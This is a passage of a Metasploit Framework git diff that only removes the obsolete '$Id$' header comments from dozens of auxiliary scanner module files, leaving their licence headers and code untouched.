b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb index 0b4bc6cd4c..afdc2eed78 100644 --- a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb +++ b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/replace_ext.rb b/modules/auxiliary/scanner/http/replace_ext.rb index 58b490d8e9..619025e552 100644 --- a/modules/auxiliary/scanner/http/replace_ext.rb +++ b/modules/auxiliary/scanner/http/replace_ext.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb index 24cc5c5cf0..a1c38b4a4a 100644 --- a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb +++ b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/robots_txt.rb b/modules/auxiliary/scanner/http/robots_txt.rb index e276f7110f..84b4d3e388 100644 --- a/modules/auxiliary/scanner/http/robots_txt.rb +++ b/modules/auxiliary/scanner/http/robots_txt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb index 602524000c..4746873573 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb index cc3614f4e1..a5448924e0 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index f6340d18f7..ccd921c1ef 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb index c69bdf58dd..b3a0e25359 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/scraper.rb b/modules/auxiliary/scanner/http/scraper.rb index d96026e52c..cf9972c111 100644 --- a/modules/auxiliary/scanner/http/scraper.rb +++ b/modules/auxiliary/scanner/http/scraper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/soap_xml.rb b/modules/auxiliary/scanner/http/soap_xml.rb index b0a1d89626..95a887a24d 100644 --- a/modules/auxiliary/scanner/http/soap_xml.rb +++ b/modules/auxiliary/scanner/http/soap_xml.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/sqlmap.rb b/modules/auxiliary/scanner/http/sqlmap.rb index 70722f8cf6..f4b63d9ffe 100644 --- a/modules/auxiliary/scanner/http/sqlmap.rb +++ b/modules/auxiliary/scanner/http/sqlmap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index d90aca8404..fd9303b7ab 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb index e65f8e3838..ec1e63e7a2 100644 --- a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb +++ b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. diff --git a/modules/auxiliary/scanner/http/ssl.rb b/modules/auxiliary/scanner/http/ssl.rb index f6910626fb..c7301f4d7a 100644 --- a/modules/auxiliary/scanner/http/ssl.rb +++ b/modules/auxiliary/scanner/http/ssl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/svn_scanner.rb b/modules/auxiliary/scanner/http/svn_scanner.rb index 3d530ce18a..4d4509658f 100644 --- a/modules/auxiliary/scanner/http/svn_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 6c4097850b..697b48fd46 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index aab3629812..dded2387bb 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb index 2925a46505..64e3fd9398 100644 --- a/modules/auxiliary/scanner/http/trace_axd.rb +++ b/modules/auxiliary/scanner/http/trace_axd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index 7d1e1dc37f..f9452ab654 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/vhost_scanner.rb b/modules/auxiliary/scanner/http/vhost_scanner.rb index 246faadc6e..f41b7af14d 100644 --- a/modules/auxiliary/scanner/http/vhost_scanner.rb +++ b/modules/auxiliary/scanner/http/vhost_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb index 19a3c08d8d..76b488add0 100644 --- a/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb +++ b/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/web_vulndb.rb b/modules/auxiliary/scanner/http/web_vulndb.rb index 0fbb20fb4d..3cf57529c9 100644 --- a/modules/auxiliary/scanner/http/web_vulndb.rb +++ b/modules/auxiliary/scanner/http/web_vulndb.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/webdav_internal_ip.rb b/modules/auxiliary/scanner/http/webdav_internal_ip.rb index cd7ebb7de7..0e5f56762c 100644 --- a/modules/auxiliary/scanner/http/webdav_internal_ip.rb +++ b/modules/auxiliary/scanner/http/webdav_internal_ip.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/webdav_scanner.rb b/modules/auxiliary/scanner/http/webdav_scanner.rb index 9d1deacf9a..6757e37a93 100644 --- a/modules/auxiliary/scanner/http/webdav_scanner.rb +++ b/modules/auxiliary/scanner/http/webdav_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/webdav_website_content.rb b/modules/auxiliary/scanner/http/webdav_website_content.rb index 568414908b..0ca4fbbd9c 100644 --- a/modules/auxiliary/scanner/http/webdav_website_content.rb +++ b/modules/auxiliary/scanner/http/webdav_website_content.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/xpath.rb b/modules/auxiliary/scanner/http/xpath.rb index 81e7c75515..ade6887976 100644 --- a/modules/auxiliary/scanner/http/xpath.rb +++ b/modules/auxiliary/scanner/http/xpath.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/imap/imap_version.rb b/modules/auxiliary/scanner/imap/imap_version.rb index b3de6171cd..12d8d411a5 100644 --- a/modules/auxiliary/scanner/imap/imap_version.rb +++ b/modules/auxiliary/scanner/imap/imap_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/ip/ipidseq.rb b/modules/auxiliary/scanner/ip/ipidseq.rb index b707128ffc..548762fa1d 100644 --- a/modules/auxiliary/scanner/ip/ipidseq.rb +++ b/modules/auxiliary/scanner/ip/ipidseq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb index 9fb1bebbdd..c20e5eb245 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb index b62af0c634..b384f447c3 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb index 7eb0476ea5..fbcc128e02 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb index f02715358f..017b667f0a 100644 --- a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb +++ b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb index c5c7c0b936..309c4b91d4 100644 --- a/modules/auxiliary/scanner/misc/java_rmi_server.rb +++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/misc/redis_server.rb b/modules/auxiliary/scanner/misc/redis_server.rb index 6d41cd5374..99248b3512 100644 --- a/modules/auxiliary/scanner/misc/redis_server.rb +++ b/modules/auxiliary/scanner/misc/redis_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb index 11507e867a..2bf05ae229 100644 --- a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb +++ b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb index a608e03297..783c46412b 100644 --- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb +++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb index 89953a2aee..140c1e7623 100644 --- a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb +++ b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb index 0b49f9b85c..0628489b17 100644 --- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/mssql/mssql_login.rb b/modules/auxiliary/scanner/mssql/mssql_login.rb index 462685ac2b..49ca3bc29d 100644 --- a/modules/auxiliary/scanner/mssql/mssql_login.rb +++ b/modules/auxiliary/scanner/mssql/mssql_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/mssql/mssql_ping.rb b/modules/auxiliary/scanner/mssql/mssql_ping.rb index d8c3d06194..cb4f642e44 100644 --- a/modules/auxiliary/scanner/mssql/mssql_ping.rb +++ b/modules/auxiliary/scanner/mssql/mssql_ping.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb index 5096044c48..a63a7bc73a 100644 --- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb index 142ef2350d..96f8285fbd 100644 --- a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb index f9782c9b9e..814a828f26 100644 --- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index df31b12700..c6b6d917d7 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb index 1a15a2bb30..0d82a5f821 100644 --- a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/mysql/mysql_version.rb b/modules/auxiliary/scanner/mysql/mysql_version.rb index 8ba017177e..fa59252e43 100644 --- a/modules/auxiliary/scanner/mysql/mysql_version.rb +++ b/modules/auxiliary/scanner/mysql/mysql_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/netbios/nbname.rb b/modules/auxiliary/scanner/netbios/nbname.rb index d965b74e2d..db2e6ffbe2 100644 --- a/modules/auxiliary/scanner/netbios/nbname.rb +++ b/modules/auxiliary/scanner/netbios/nbname.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/netbios/nbname_probe.rb b/modules/auxiliary/scanner/netbios/nbname_probe.rb index 84680d406e..cb353bf92f 100644 --- a/modules/auxiliary/scanner/netbios/nbname_probe.rb +++ b/modules/auxiliary/scanner/netbios/nbname_probe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb index d5265eebea..67d93598a5 100644 --- a/modules/auxiliary/scanner/nfs/nfsmount.rb +++ b/modules/auxiliary/scanner/nfs/nfsmount.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index 4df4e02ae1..dd80670e53 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/oracle/emc_sid.rb b/modules/auxiliary/scanner/oracle/emc_sid.rb index 27a4bea0ea..8894235695 100644 --- a/modules/auxiliary/scanner/oracle/emc_sid.rb +++ b/modules/auxiliary/scanner/oracle/emc_sid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/oracle/isqlplus_login.rb b/modules/auxiliary/scanner/oracle/isqlplus_login.rb index 5abfb3f68c..853eabcc5e 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_login.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb index e742578162..4aef247c17 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb index ea08ad3445..14f29de481 100644 --- a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb +++ b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/oracle/oracle_login.rb b/modules/auxiliary/scanner/oracle/oracle_login.rb index 1e804f960e..f2ac9f8b28 100644 --- a/modules/auxiliary/scanner/oracle/oracle_login.rb +++ b/modules/auxiliary/scanner/oracle/oracle_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/oracle/sid_brute.rb b/modules/auxiliary/scanner/oracle/sid_brute.rb index 44940aa7af..3cf861a493 100644 --- a/modules/auxiliary/scanner/oracle/sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/sid_brute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/oracle/sid_enum.rb b/modules/auxiliary/scanner/oracle/sid_enum.rb index f86c381db4..8d00242322 100644 --- a/modules/auxiliary/scanner/oracle/sid_enum.rb +++ b/modules/auxiliary/scanner/oracle/sid_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/oracle/spy_sid.rb b/modules/auxiliary/scanner/oracle/spy_sid.rb index b379a05843..8848fdd89d 100644 --- a/modules/auxiliary/scanner/oracle/spy_sid.rb +++ b/modules/auxiliary/scanner/oracle/spy_sid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb index b67bac6636..09e0628831 100644 --- a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb +++ b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/oracle/xdb_sid.rb b/modules/auxiliary/scanner/oracle/xdb_sid.rb index 3b4ee0101d..47e6150d4a 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb index 6906784798..2130bce7eb 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb index 0734bafe48..c11c6e5814 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb index 8c39d1dfa4..0f57fbb37d 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb index 0ba7439fdb..25dc671205 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/pop3/pop3_login.rb b/modules/auxiliary/scanner/pop3/pop3_login.rb index c713b64403..97fe2252ee 100644 --- a/modules/auxiliary/scanner/pop3/pop3_login.rb +++ b/modules/auxiliary/scanner/pop3/pop3_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. diff --git a/modules/auxiliary/scanner/pop3/pop3_version.rb b/modules/auxiliary/scanner/pop3/pop3_version.rb index e5eb4386f9..0f902ef5f4 100644 --- a/modules/auxiliary/scanner/pop3/pop3_version.rb +++ b/modules/auxiliary/scanner/pop3/pop3_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/portscan/ack.rb b/modules/auxiliary/scanner/portscan/ack.rb index 8025687e7f..45122d25bc 100644 --- a/modules/auxiliary/scanner/portscan/ack.rb +++ b/modules/auxiliary/scanner/portscan/ack.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/portscan/ftpbounce.rb b/modules/auxiliary/scanner/portscan/ftpbounce.rb index a06963bc80..139685e883 100644 --- a/modules/auxiliary/scanner/portscan/ftpbounce.rb +++ b/modules/auxiliary/scanner/portscan/ftpbounce.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/portscan/syn.rb b/modules/auxiliary/scanner/portscan/syn.rb index cf4d8307b9..b0698220e1 100644 --- a/modules/auxiliary/scanner/portscan/syn.rb +++ b/modules/auxiliary/scanner/portscan/syn.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git 